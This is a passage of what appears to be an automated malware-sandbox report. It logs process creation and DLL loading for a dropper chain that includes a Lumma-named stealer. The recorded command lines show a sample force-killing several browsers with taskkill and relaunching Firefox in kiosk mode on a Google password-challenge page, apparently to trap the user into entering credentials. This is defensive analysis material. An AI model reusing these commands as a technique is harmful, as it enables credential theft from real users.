Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe "C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe "C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2252 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {764fe40d-22ed-4bc9-8bbf-cf1b54f9bef0} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" 1de7406db10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 3956 -prefMapHandle 3960 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c30cc886-e8f0-49cd-833d-6f1412d347ff} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" 1de04753b10 rdd
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
